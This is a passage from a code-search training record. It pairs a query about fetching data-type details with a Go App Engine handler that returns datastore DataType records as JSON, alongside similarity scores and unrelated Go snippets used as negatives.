p.BatchTime,\n\t\tRemotePath: utility.FromStringPtr(p.RemotePath),\n\t\tId: utility.FromStringPtr(p.Id),\n\t\tIdentifier: utility.FromStringPtr(p.Identifier),\n\t\tDisplayName: utility.FromStringPtr(p.DisplayName),\n\t\tDeactivatePrevious: utility.BoolPtrCopy(p.DeactivatePrevious),\n\t\tTracksPushEvents: utility.BoolPtrCopy(p.TracksPushEvents),\n\t\tDefaultLogger: utility.FromStringPtr(p.DefaultLogger),\n\t\tPRTestingEnabled: utility.BoolPtrCopy(p.PRTestingEnabled),\n\t\tGitTagVersionsEnabled: utility.BoolPtrCopy(p.GitTagVersionsEnabled),\n\t\tGithubChecksEnabled: utility.BoolPtrCopy(p.GithubChecksEnabled),\n\t\tUseRepoSettings: p.UseRepoSettings,\n\t\tRepoRefId: utility.FromStringPtr(p.RepoRefId),\n\t\tCommitQueue: commitQueue.(model.CommitQueueParams),\n\t\tTaskSync: taskSync,\n\t\tWorkstationConfig: workstationConfig,\n\t\tHidden: utility.BoolPtrCopy(p.Hidden),\n\t\tPatchingDisabled: utility.BoolPtrCopy(p.PatchingDisabled),\n\t\tRepotrackerDisabled: utility.BoolPtrCopy(p.RepotrackerDisabled),\n\t\tDispatchingDisabled: utility.BoolPtrCopy(p.DispatchingDisabled),\n\t\tDisabledStatsCache: utility.BoolPtrCopy(p.DisabledStatsCache),\n\t\tFilesIgnoredFromCache: utility.FromStringPtrSlice(p.FilesIgnoredFromCache),\n\t\tNotifyOnBuildFailure: utility.BoolPtrCopy(p.NotifyOnBuildFailure),\n\t\tSpawnHostScriptPath: utility.FromStringPtr(p.SpawnHostScriptPath),\n\t\tAdmins: utility.FromStringPtrSlice(p.Admins),\n\t\tGitTagAuthorizedUsers: utility.FromStringPtrSlice(p.GitTagAuthorizedUsers),\n\t\tGitTagAuthorizedTeams: utility.FromStringPtrSlice(p.GitTagAuthorizedTeams),\n\t\tGithubTriggerAliases: utility.FromStringPtrSlice(p.GithubTriggerAliases),\n\t}\n\n\t// Copy triggers\n\tif p.Triggers != nil {\n\t\ttriggers := []model.TriggerDefinition{}\n\t\tfor _, t := range p.Triggers {\n\t\t\ti, err = t.ToService()\n\t\t\tif err != nil {\n\t\t\t\treturn nil, errors.Wrap(err, \"cannot convert API trigger definition\")\n\t\t\t}\n\t\t\tnewTrigger, ok := i.(model.TriggerDefinition)\n\t\t\tif !ok {\n\t\t\t\treturn nil, errors.Errorf(\"expected trigger definition but was actually '%T'\", i)\n\t\t\t}\n\t\t\ttriggers = append(triggers, newTrigger)\n\t\t}\n\t\tprojectRef.Triggers = triggers\n\t}\n\n\t// Copy periodic builds\n\tif p.PeriodicBuilds != nil {\n\t\tbuilds := []model.PeriodicBuildDefinition{}\n\t\tfor _, t := range p.Triggers {\n\t\t\ti, err = t.ToService()\n\t\t\tif err != nil {\n\t\t\t\treturn nil, errors.Wrap(err, \"cannot convert API periodic build\")\n\t\t\t}\n\t\t\tnewBuild, ok := i.(model.PeriodicBuildDefinition)\n\t\t\tif !ok {\n\t\t\t\treturn nil, errors.Errorf(\"expected periodic build definition but was actually '%T'\", i)\n\t\t\t}\n\t\t\tbuilds = append(builds, newBuild)\n\t\t}\n\t\tprojectRef.PeriodicBuilds = builds\n\t}\n\n\tif p.PatchTriggerAliases != nil {\n\t\tpatchTriggers := []patch.PatchTriggerDefinition{}\n\t\tfor _, t := range p.PatchTriggerAliases {\n\t\t\ti, err = t.ToService()\n\t\t\tif err != nil {\n\t\t\t\treturn nil, errors.Wrap(err, \"cannot convert API patch trigger definition\")\n\t\t\t}\n\t\t\ttrigger, ok := i.(patch.PatchTriggerDefinition)\n\t\t\tif !ok {\n\t\t\t\treturn nil, errors.Errorf(\"expected patch trigger definition but was actually '%T'\", i)\n\t\t\t}\n\t\t\tpatchTriggers = append(patchTriggers, trigger)\n\t\t}\n\t\tprojectRef.PatchTriggerAliases = patchTriggers\n\t}\n\treturn &projectRef, nil\n}", "func NewService(bin Bin) *Service {\n\tbin.ShouldStillBeRunningAfterTest = true\n\treturn &Service{\n\t\tBin: bin,\n\t\tReadyForCleanup: make(chan struct{}),\n\t}\n}", "func newValidator(svc Service) (Service, error) {\n\treturn validator{next: svc}, nil\n}", "func NewGitClient(t mockConstructorTestingTNewGitClient) *GitClient {\n\tmock := &GitClient{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func (tc *MXController) createNewService(mxjob *mxv1beta1.MXJob, rtype mxv1beta1.MXReplicaType, index string, spec *mxv1beta1.MXReplicaSpec) error {\n\tmxjobKey, err := KeyFunc(mxjob)\n\tif err != nil {\n\t\tutilruntime.HandleError(fmt.Errorf(\"couldn't get key for mxjob object %#v: %v\", mxjob, err))\n\t\treturn err\n\t}\n\n\t// Convert MXReplicaType to lower string.\n\trt := strings.ToLower(string(rtype))\n\texpectationServicesKey := jobcontroller.GenExpectationServicesKey(mxjobKey, rt)\n\terr = tc.Expectations.ExpectCreations(expectationServicesKey, 1)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Create OwnerReference.\n\tcontrollerRef := tc.GenOwnerReference(mxjob)\n\n\t// Append mxReplicaTypeLabel and mxReplicaIndexLabel labels.\n\tlabels := tc.GenLabels(mxjob.Name)\n\tlabels[mxReplicaTypeLabel] = rt\n\tlabels[mxReplicaIndexLabel] = index\n\n\tport, err := GetPortFromMXJob(mxjob, rtype)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tservice := &v1.Service{\n\t\tSpec: v1.ServiceSpec{\n\t\t\tClusterIP: \"None\",\n\t\t\tSelector: labels,\n\t\t\tPorts: []v1.ServicePort{\n\t\t\t\t{\n\t\t\t\t\tName: mxv1beta1.DefaultPortName,\n\t\t\t\t\tPort: port,\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n\n\tservice.Name = jobcontroller.GenGeneralName(mxjob.Name, rt, index)\n\tservice.Labels = labels\n\n\terr = tc.ServiceControl.CreateServicesWithControllerRef(mxjob.Namespace, service, mxjob, controllerRef)\n\tif err != nil && errors.IsTimeout(err) {\n\t\t// Service is created but its initialization has timed out.\n\t\t// If the initialization is successful eventually, the\n\t\t// controller will observe the creation via the informer.\n\t\t// If the initialization fails, or if the service keeps\n\t\t// uninitialized for a long time, the informer will not\n\t\t// receive any update, and the controller will create a new\n\t\t// service when the expectation expires.\n\t\treturn nil\n\t} else if err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}" ]
[ "0.61277133", "0.5656435", "0.5619453", "0.54407775", "0.5274641", "0.5209439", "0.5191312", "0.5136981", "0.49495593", "0.4917797", "0.48863798", "0.48752347", "0.48572385", "0.47870165", "0.47863263", "0.47311988", "0.47112477", "0.46971738", "0.46850052", "0.46345636", "0.4626352", "0.46034846", "0.4594172", "0.4566052", "0.453283", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.4516845", "0.45089915", "0.45050094", "0.45032033", "0.44983822", "0.4497709", "0.44916064", "0.448914", "0.44869998", "0.44733396", "0.44676846", "0.44658884", "0.44617853", "0.44614264", "0.44558427", "0.445406", "0.44506484", "0.4447998", "0.44424686", "0.44403678", "0.44388416", "0.44363576", "0.443486", "0.44264466", "0.44170025", "0.4395732", "0.43930572", "0.439264", "0.4383601", "0.43795708", "0.43719497", "0.4368343", "0.43664217", "0.43634686", "0.43570876", "0.4347219", "0.43367255", "0.43361902", "0.43354937", "0.43315467", "0.43269923", "0.4324143", "0.4311616", "0.43095228", "0.4304629", "0.42963594", "0.42963594", "0.42963594", "0.42948368", "0.42879796", "0.42861655", "0.42860398", "0.4281556", "0.42642424", "0.4254907", "0.42513365", "0.42449698", "0.42347294", "0.4230987" ]
0.84137696
0
var queryType = "DataType" GET DATA TYPE DETAILS
func control_data_type_details(w http.ResponseWriter, r *http.Request) { //ADMIN checkAdmin(w,r) //PARAMETERS itemID := strings.Split(r.RequestURI,"/") //fmt.Fprintln(w,itemID[5]) //CONTEXT c := appengine.NewContext(r) //DECODE KEY key,err := datastore.DecodeKey(itemID[5]) //KEY ERR if err != nil { fmt.Fprintln(w, "error decoding") return } /*******************************GET**************************/ if r.Method == "GET"{ //QUERY q := datastore.NewQuery("DataType").Filter("__key__ =", key).Limit(1).Limit(100) //DB GET ALL var db []*DataType _,err := q.GetAll(c,&db) //DB ERR if err != nil { fmt.Fprint(w,"error getting items") return } //VAR dbData := []DataType{} //FOR LOOP 1 DB ITEMS for i := range db { //KEYS ENCODE //k := keys[i].Encode() TheFields := []FieldType {} //DEBUG //fmt.Fprintln(w,k) //fmt.Fprintln(w,db[i].Fields[0].Name) //fmt.Fprintln(w,len(db[i].Fields)-1) //FOR LOOP 2 FIELDS for j := 0; j <= (len(db[i].Fields)-1); j++ { TheFields = append(TheFields, FieldType { Name: db[i].Fields[j].Name , UI: db[i].Fields[j].UI , }) //END FOR 2 } //APPEND dbData = append(dbData, DataType { Title: db[i].Title, URL: db[i].URL, //"key": k, Fields: TheFields, }, ) //END FOR 1 } //fmt.Fprintln(w,data) //fmt.Fprintln(w,dbData) //fmt.Fprintln(w,r.Header.Get("X-Requested-With")) //"X-Requested-With" if r.Header.Get("X-Requested-With") != "" { //MARSHAL JSON j,errJSON := json.Marshal(dbData) if errJSON != nil { fmt.Fprintln(w,"error with JSON") } //SET CONTENT-TYPE w.Header().Set("Content-Type", "application/json") //DISPLAY JSON fmt.Fprint(w,string(j)) } //END GET } //END FUNC }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (c *QueryDescriptor) QueryType() string {\n\treturn typeOf(c.query)\n}", "func QueryType(typeName string) QueryBuilder {\n\treturn Query(TypeFn(typeName))\n}", "func getQueryType(db *pg.DB, modelType *graphql.Object) *graphql.Object {\n\treturn graphql.NewObject(graphql.ObjectConfig{\n\t\tName: \"Query\",\n\t\tFields: graphql.Fields{\n\t\t\t\"client\": &graphql.Field{\n\t\t\t\tType: modelType,\n\t\t\t\tArgs: graphql.FieldConfigArgument{\n\t\t\t\t\t\"id\": &graphql.ArgumentConfig{\n\t\t\t\t\t\tDescription: \"Client ID filter\",\n\t\t\t\t\t\tType: graphql.NewNonNull(graphql.Int),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tResolve: func(p graphql.ResolveParams) (interface{}, error) {\n\t\t\t\t\tclient, err := getClient(db, p.Args[\"id\"].(int))\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn nil, fmt.Errorf(\"client for id %d fetch err: %s\", p.Args[\"id\"], err.Error())\n\t\t\t\t\t}\n\t\t\t\t\treturn client, nil\n\t\t\t\t},\n\t\t\t},\n\n\t\t\t\"clients\": &graphql.Field{\n\t\t\t\tType: graphql.NewList(modelType),\n\t\t\t\tArgs: graphql.FieldConfigArgument{\n\t\t\t\t\t//Data filter\n\t\t\t\t\t\"client_name\": &graphql.ArgumentConfig{\n\t\t\t\t\t\tDescription: \"Client name filter\",\n\t\t\t\t\t\tType: graphql.String,\n\t\t\t\t\t\tDefaultValue: \"\",\n\t\t\t\t\t},\n\t\t\t\t\t//Pagination filter\n\t\t\t\t\t\"first\": &graphql.ArgumentConfig{ //is a limit replacement\n\t\t\t\t\t\tDescription: \"Pagination limit filter\",\n\t\t\t\t\t\tType: graphql.Int,\n\t\t\t\t\t\tDefaultValue: 10,\n\t\t\t\t\t},\n\t\t\t\t\t\"offset\": &graphql.ArgumentConfig{\n\t\t\t\t\t\tDescription: \"Pagination offset filter\",\n\t\t\t\t\t\tType: graphql.Int,\n\t\t\t\t\t\tDefaultValue: 0,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tResolve: func(p graphql.ResolveParams) (interface{}, error) {\n\t\t\t\t\tclients, err := getClients(db, p.Args[\"client_name\"].(string), p.Args[\"first\"].(int), p.Args[\"offset\"].(int))\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn nil, fmt.Errorf(\"clients fetch err: %s\", err.Error())\n\t\t\t\t\t}\n\t\t\t\t\treturn clients, nil\n\t\t\t\t},\n\t\t\t},\n\n\t\t\t\"totalCount\": &graphql.Field{\n\t\t\t\tType: graphql.Int,\n\t\t\t\tResolve: func(p graphql.ResolveParams) (interface{}, error) {\n\t\t\t\t\tcnt, err := getClientsCount(db)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn nil, fmt.Errorf(\"clients counting err: %s\", err.Error())\n\t\t\t\t\t}\n\t\t\t\t\treturn cnt, nil\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t})\n}", "func (dqlx *dqlx) QueryType(typeName string) QueryBuilder {\n\treturn QueryType(typeName).WithDClient(dqlx.dgraph)\n}", "func (e *Equipment) QueryType() *EquipmentTypeQuery {\n\treturn (&EquipmentClient{e.config}).QueryType(e)\n}", "func (*CallbackQueryPayloadData) TypeName() string {\n\treturn \"callbackQueryPayloadData\"\n}", "func (a *Array) QueryType() (QueryType, error) {\n\tvar queryType C.tiledb_query_type_t\n\tret := C.tiledb_array_get_query_type(a.context.tiledbContext, a.tiledbArray, &queryType)\n\tif ret != C.TILEDB_OK {\n\t\treturn -1, fmt.Errorf(\"Error getting QueryType for tiledb array: %s\", a.context.LastError())\n\t}\n\treturn QueryType(queryType), nil\n}", "func (db *DB) GetUsageType(ip string) (*Record, error) { return db.query(ip, ModeUsageType) }", "func (*CallbackQueryPayloadData) TypeID() uint32 {\n\treturn CallbackQueryPayloadDataTypeID\n}", "func (t systemSetType) Type() query.Type {\n\treturn sqltypes.VarChar\n}", "func (s *snowflake) DataTypeOf(field *StructField) string {\n\tfmt.Println(\"Yelp\")\n\tvar dataValue, sqlType, size, additionalType = ParseFieldStructForDialect(field, s)\n\tfmt.Printf(\"Type %v: %v\\n\", dataValue.Kind(), dataValue)\n\tif sqlType == \"\" {\n\t\tswitch dataValue.Kind() {\n\t\tcase reflect.Bool:\n\t\t\tsqlType = \"BOOLEAN\"\n\t\tcase reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uintptr:\n\t\t\tif s.fieldCanAutoIncrement(field) {\n\t\t\t\tfield.TagSettingsSet(\"AUTO_INCREMENT\", \"AUTO_INCREMENT\")\n\t\t\t\tsqlType = \"INTEGER AUTOINCREMENT\"\n\t\t\t} else {\n\t\t\t\tsqlType = \"INTEGER\"\n\t\t\t}\n\t\tcase reflect.Float32, reflect.Float64:\n\t\t\tsqlType = \"NUMERIC\"\n\t\tcase reflect.String:\n\t\t\tif _, ok := field.TagSettingsGet(\"SIZE\"); !ok {\n\t\t\t\tsize = 0 // if SIZE haven't been set, use `text` as the default type, as there are no performance different\n\t\t\t}\n\n\t\t\tif size > 0 && size < 65532 {\n\t\t\t\tsqlType = fmt.Sprintf(\"VARCHAR(%d)\", size)\n\t\t\t} else {\n\t\t\t\tsqlType = \"TEXT\"\n\t\t\t}\n\t\tcase reflect.Struct:\n\t\t\tfmt.Println(\"Struct!\")\n\t\t\tif _, ok := dataValue.Interface().(time.Time); ok {\n\t\t\t\tsqlType = \"TIMESTAMP_TZ\"\n\t\t\t} else {\n\t\t\t\tsqlType = \"VARIANT\"\n\t\t\t}\n\t\tcase reflect.Map:\n\t\t\tsqlType = \"VARIANT\"\n\t\tdefault:\n\t\t\tif IsArrayOrSlice(dataValue) { \n\t\t\t\tsqlType = \"VARIANT\"\n\t\t\t\tif IsByteArrayOrSlice(dataValue) {\n\t\t\t\t\tsqlType = \"BINARY\"\n\n\t\t\t\t\tif isJSON(dataValue) {\n\t\t\t\t\t\tsqlType = \"VARIANT\"\n\t\t\t\t\t}\n\t\t\t\t} \n\t\t\t}\n\t\t}\n\t}\n\n\tfmt.Printf(\"SQL TYPE: %s\\n\", sqlType)\n\tif sqlType == \"\" {\n\t\tpanic(fmt.Sprintf(\"invalid sql type %s (%s) for snowflake\", dataValue.Type().Name(), dataValue.Kind().String()))\n\t}\n\n\tif strings.TrimSpace(additionalType) == \"\" {\n\t\treturn sqlType\n\t}\n\treturn fmt.Sprintf(\"%v %v\", sqlType, additionalType)\n}", "func QueryType(handle handle.Handle) (string, error) {\n\tbuffer := make([]byte, typeBufSize)\n\tsize, err := object.Query(handle, object.TypeInformationClass, buffer)\n\tif err == errs.ErrNeedsReallocateBuffer {\n\t\tbuffer = make([]byte, size)\n\t\tif _, err = object.Query(handle, object.TypeInformationClass, buffer); err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"couldn't query handle type after buffer reallocation: %v\", err)\n\t\t}\n\t}\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"couldn't query handle type: %v\", err)\n\t}\n\t// transform buffer into type information structure and get\n\t// the underlying UNICODE string that identifies handle's type name\n\ttypeInfo := (*object.TypeInformation)(unsafe.Pointer(&buffer[0]))\n\tlength := typeInfo.TypeName.Length\n\tif length > 0 {\n\t\treturn typeInfo.TypeName.String(), nil\n\t}\n\treturn \"\", errors.New(\"zero length handle type name encountered\")\n}", "func (p *queryPlan) Type() string {\n\treturn \"SELECT\"\n}", "func (t JsonType) Type() query.Type {\n\treturn sqltypes.TypeJSON\n}", "func Type() *dataType {\n\treturn &dataType{str: field.StringType()}\n}", "func dataTypeFromModelsFieldType(fieldType models.FieldType) influxql.DataType {\n\tswitch fieldType {\n\tcase models.Float:\n\t\treturn influxql.Float\n\tcase models.Integer:\n\t\treturn influxql.Integer\n\tcase models.Unsigned:\n\t\treturn influxql.Unsigned\n\tcase models.Boolean:\n\t\treturn influxql.Boolean\n\tcase models.String:\n\t\treturn influxql.String\n\tdefault:\n\t\treturn influxql.Unknown\n\t}\n}", "func (wo *WorkOrder) QueryType() *WorkOrderTypeQuery {\n\treturn (&WorkOrderClient{wo.config}).QueryType(wo)\n}", "func (qr *queryResult) ColumnTypeDatabaseTypeName(idx int) string { return qr.fields[idx].TypeName() }", "func (qr *queryResult) ColumnTypeDatabaseTypeName(idx int) string { return qr.fields[idx].TypeName() }", "func DataType(){\n\tBool()\n\tFloat()\n\tComplex()\n\tStdInput()\n}", "func (QueryEvent) Type() EventType {\n\treturn EventQuery\n}", "func (FindAllPersonsQuery) Type() query.Type {\n\treturn PersonQueryType\n}", "func (l *Location) QueryType() *LocationTypeQuery {\n\treturn (&LocationClient{l.config}).QueryType(l)\n}", "func (f *File) QueryType() *FileTypeQuery {\n\treturn NewFileClient(f.config).QueryType(f)\n}", "func (t DataType) TypeName() string { return typeNames[t] }", "func Type(v string) predicate.Blob {\n\treturn predicate.Blob(\n\t\tfunc(s *sql.Selector) {\n\t\t\ts.Where(sql.EQ(s.C(FieldType), v))\n\t\t},\n\t)\n}", "func TypeQuery_(type_ Type) *TypeQuery {\n\tc_type := (C.GType)(type_)\n\n\tvar c_query C.GTypeQuery\n\n\tC.g_type_query(c_type, &c_query)\n\n\tquery := TypeQueryNewFromC(unsafe.Pointer(&c_query))\n\n\treturn query\n}", "func (pr *Project) QueryType() *ProjectTypeQuery {\n\treturn (&ProjectClient{pr.config}).QueryType(pr)\n}", "func (wq *WidgetQuery) QueryType() *WidgetTypeQuery {\n\tquery := &WidgetTypeQuery{config: wq.config}\n\tquery.path = func(ctx context.Context) (fromU *sql.Selector, err error) {\n\t\tif err := wq.prepareQuery(ctx); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tselector := wq.sqlQuery(ctx)\n\t\tif err := selector.Err(); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tstep := sqlgraph.NewStep(\n\t\t\tsqlgraph.From(widget.Table, widget.FieldID, selector),\n\t\t\tsqlgraph.To(widgettype.Table, widgettype.FieldID),\n\t\t\tsqlgraph.Edge(sqlgraph.M2O, false, widget.TypeTable, widget.TypeColumn),\n\t\t)\n\t\tfromU = sqlgraph.SetNeighbors(wq.driver.Dialect(), step)\n\t\treturn fromU, nil\n\t}\n\treturn query\n}", "func (t *MockTask) QueryTypeMetricLabel() string {\n\treturn \"mock\"\n}", "func getDatastoreKind(kind reflect.Type) (dsKind string) {\n\tdsKind = kind.String()\n\tif li := strings.LastIndex(dsKind, \".\"); li >= 0 {\n\t\t//Format kind to be in a standard format used for datastore\n\t\tdsKind = dsKind[li+1:]\n\t}\n\treturn\n}", "func (client Client) GetQueryType(queryType string) string {\n\tif client.IsSysAdmin {\n\t\tadminType, ok := types.AdminQueryTypes[queryType]\n\t\tif ok {\n\t\t\treturn adminType\n\t\t} else {\n\t\t\tpanic(fmt.Sprintf(\"no corresponding admin type found for type %s\", queryType))\n\t\t}\n\t}\n\treturn queryType\n}", "func (c *CallbackQueryPayloadData) TypeInfo() tdp.Type {\n\ttyp := tdp.Type{\n\t\tName: \"callbackQueryPayloadData\",\n\t\tID: CallbackQueryPayloadDataTypeID,\n\t}\n\tif c == nil {\n\t\ttyp.Null = true\n\t\treturn typ\n\t}\n\ttyp.Fields = []tdp.Field{\n\t\t{\n\t\t\tName: \"Data\",\n\t\t\tSchemaName: \"data\",\n\t\t},\n\t}\n\treturn typ\n}", "func (q Query) Type(column interface{}) (DBType, error) {\n\tname, ok := column.(string)\n\tidx := 0\n\tvar err error\n\n\tif !ok {\n\t\tidx, ok = column.(int)\n\t\tif !ok {\n\t\t\tpanic(fmt.Sprintf(\"Expected int or string but got %v\", reflect.TypeOf(column)))\n\t\t}\n\t} else {\n\t\tidx, err = q.IndexOf(name)\n\t}\n\n\tif err != nil {\n\t\treturn -1, fmt.Errorf(\"Unknown column %v, %d\", column, idx)\n\t}\n\n\t//targetType := q.types[idx].DatabaseTypeName()\n\t//switch {\n\t//\tcase targetType == \"VARCHAR\" || targetType == \"TEXT\"\n\t//}\n\treturn DBUnknown, nil\n}", "func (ms *MySQLStore) getByProvidedType(t GetByType, arg interface{}) (*Survey, error) {\n\tsel := string(\"SELECT SurveyID, DemographicID, ActivityID, GivenName, CreationDate, OverallScore, LastSurveyID FROM TblSurvey WHERE \" + t + \" = ?\")\n\n\trows, err := ms.Database.Query(sel, arg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\tsurvey := &Survey{}\n\n\t// Should never have more than one row, so only grab one\n\trows.Next()\n\tif err := rows.Scan(\n\t\t&survey.SurveyID,\n\t\t&survey.DemographicID,\n\t\t&survey.ActivityID,\n\t\t&survey.GivenName,\n\t\t&survey.CreationDate,\n\t\t&survey.OverallScore,\n\t\t&survey.LastSurveyID); err != nil {\n\t\treturn nil, err\n\t}\n\treturn survey, nil\n}", "func (ec *executionContext) field_Query___type_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {\n\tvar err error\n\targs := map[string]interface{}{}\n\tvar arg0 string\n\tif tmp, ok := rawArgs[\"name\"]; ok {\n\t\targ0, err = ec.unmarshalNString2string(ctx, tmp)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\targs[\"name\"] = arg0\n\treturn args, nil\n}", "func (lq *LocationQuery) QueryType() *LocationTypeQuery {\n\tquery := &LocationTypeQuery{config: lq.config}\n\tstep := sqlgraph.NewStep(\n\t\tsqlgraph.From(location.Table, location.FieldID, lq.sqlQuery()),\n\t\tsqlgraph.To(locationtype.Table, locationtype.FieldID),\n\t\tsqlgraph.Edge(sqlgraph.M2O, false, location.TypeTable, location.TypeColumn),\n\t)\n\tquery.sql = sqlgraph.SetNeighbors(lq.driver.Dialect(), step)\n\treturn query\n}", "func getType(dataType dataType, size int) colType {\n\tti := colType{dataType: dataType, size: size}\n\t// try to get type props if exists\n\tti.getTypeProperties()\n\treturn ti\n}", "func (s *Dataset) Type() (*Datatype, error) {\n\thid := C.H5Dget_type(s.id)\n\terr := h5err(C.herr_t(int(hid)))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdt := NewDatatype(hid, nil)\n\treturn dt, err\n}", "func (z RequestData) Query() interface{} {\n\treturn z.q\n}", "func (t Type) SQL() string {\n\tswitch t {\n\tcase Int32:\n\t\treturn \"INTEGER\"\n\tcase Int64:\n\t\treturn \"BIGINT\"\n\tcase Float64:\n\t\treturn \"DOUBLE\"\n\tcase String:\n\t\treturn \"VARCHAR\"\n\tcase Bool:\n\t\treturn \"BOOLEAN\"\n\tcase Timestamp:\n\t\treturn \"TIMESTAMP\"\n\tcase JSON:\n\t\treturn \"JSON\"\n\t}\n\n\tpanic(fmt.Errorf(\"typeof: sql type for %v is not found\", t))\n}", "func (RestController *RestController) GetDataType(w http.ResponseWriter, r *http.Request, p httprouter.Params) {\n\tid, err01 := strconv.Atoi(p.ByName(\"id\"))\n\tif err01 == nil {\n\t\tdataType, err02 := RestController.databaseController.GetDataType(uint(id))\n\t\tif err02 == nil {\n\t\t\tjsonBytes, err03 := json.Marshal(*dataType)\n\t\t\tif err03 == nil {\n\t\t\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\t\t\tw.WriteHeader(200)\n\t\t\t\tfmt.Fprintf(w, \"%s\", jsonBytes)\n\t\t\t} else {\n\t\t\t\tmsg := fmt.Sprintf(\"An error occurred during marshaling of list of data types: %s\\n\", err03)\n\t\t\t\tw.Header().Set(\"Content-Type\", \"text/plain\")\n\t\t\t\tw.WriteHeader(500)\n\t\t\t\tfmt.Fprintf(w, \"%s\", msg)\n\t\t\t\tconfiguration.Error.Printf(msg)\n\t\t\t}\n\t\t} else {\n\t\t\tw.Header().Set(\"Content-Type\", \"text/plain\")\n\t\t\tw.WriteHeader(404)\n\t\t\tfmt.Fprintf(w, \"%s\", err02)\n\t\t}\n\t} else {\n\t\tw.Header().Set(\"Content-Type\", \"text/plain\")\n\t\tw.WriteHeader(400)\n\t\tfmt.Fprintf(w, \"%s\", err01)\n\t}\n}", "func (d UserData) Type() string {\n\tval := d.ModelData.Get(models.NewFieldName(\"Type\", \"type\"))\n\tif !d.Has(models.NewFieldName(\"Type\", \"type\")) {\n\t\treturn *new(string)\n\t}\n\treturn val.(string)\n}", "func (ec *executionContext) field_Query___type_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {\n\tvar err error\n\targs := map[string]interface{}{}\n\tvar arg0 string\n\tif tmp, ok := rawArgs[\"name\"]; ok {\n\t\tctx := graphql.WithPathContext(ctx, graphql.NewPathWithField(\"name\"))\n\t\targ0, err = ec.unmarshalNString2string(ctx, tmp)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\targs[\"name\"] = arg0\n\treturn args, nil\n}", "func (ec *executionContext) field_Query___type_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {\n\tvar err error\n\targs := map[string]interface{}{}\n\tvar arg0 string\n\tif tmp, ok := rawArgs[\"name\"]; ok {\n\t\tctx := graphql.WithPathContext(ctx, graphql.NewPathWithField(\"name\"))\n\t\targ0, err = ec.unmarshalNString2string(ctx, tmp)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\targs[\"name\"] = arg0\n\treturn args, nil\n}", "func (ec *executionContext) field_Query___type_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {\n\tvar err error\n\targs := map[string]interface{}{}\n\tvar arg0 string\n\tif tmp, ok := rawArgs[\"name\"]; ok {\n\t\tctx := graphql.WithPathContext(ctx, graphql.NewPathWithField(\"name\"))\n\t\targ0, err = ec.unmarshalNString2string(ctx, tmp)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\targs[\"name\"] = arg0\n\treturn args, nil\n}", "func (c criterionFunc) DataType() CriterionDataType {\n\treturn c.dataType\n}", "func (q *QueryType) String() (s string) {\n\treturn queryTypes[*q]\n}", "func (t *jsonDataType) Type() interface{} {\n\treturn \"\"\n}", "func (s UserSet) Type() string {\n\tres, _ := s.RecordCollection.Get(models.NewFieldName(\"Type\", \"type\")).(string)\n\treturn res\n}", "func (ds *redisDatasource) QueryData(ctx context.Context, req *backend.QueryDataRequest) (*backend.QueryDataResponse, error) {\n\tlog.DefaultLogger.Debug(\"QueryData\", \"request\", req)\n\n\t// Get Instance\n\tclient, err := ds.getInstance(req.PluginContext)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Create response struct\n\tresponse := backend.NewQueryDataResponse()\n\n\t// Loop over queries and execute them individually\n\tfor _, q := range req.Queries {\n\t\tvar qm queryModel\n\n\t\t// Unmarshal the json into our queryModel\n\t\terr := json.Unmarshal(q.JSON, &qm)\n\t\tlog.DefaultLogger.Debug(\"QueryData\", \"JSON\", q.JSON)\n\n\t\t// Error\n\t\tif err != nil {\n\t\t\tresp := backend.DataResponse{}\n\t\t\tresp.Error = err\n\t\t\tresponse.Responses[q.RefID] = resp\n\t\t\tcontinue\n\t\t}\n\n\t\t// Execute query\n\t\tresp := query(ctx, q, client, qm)\n\n\t\t// Add Time for Streaming and filter fields\n\t\tif qm.Streaming && qm.StreamingDataType != \"DataFrame\" {\n\t\t\tfor _, frame := range resp.Frames {\n\t\t\t\ttimeValues := []time.Time{}\n\n\t\t\t\tlen, _ := frame.RowLen()\n\t\t\t\tif len > 0 {\n\t\t\t\t\tfor j := 0; j < len; j++ {\n\t\t\t\t\t\ttimeValues = append(timeValues, time.Now())\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t// Filter Fields for Alerting and traffic optimization\n\t\t\t\tif qm.Field != \"\" {\n\t\t\t\t\t// Split Field to array\n\t\t\t\t\tfields, ok := shell.Split(qm.Field)\n\n\t\t\t\t\t// Check if filter is valid\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tresp.Error = fmt.Errorf(\"field is not 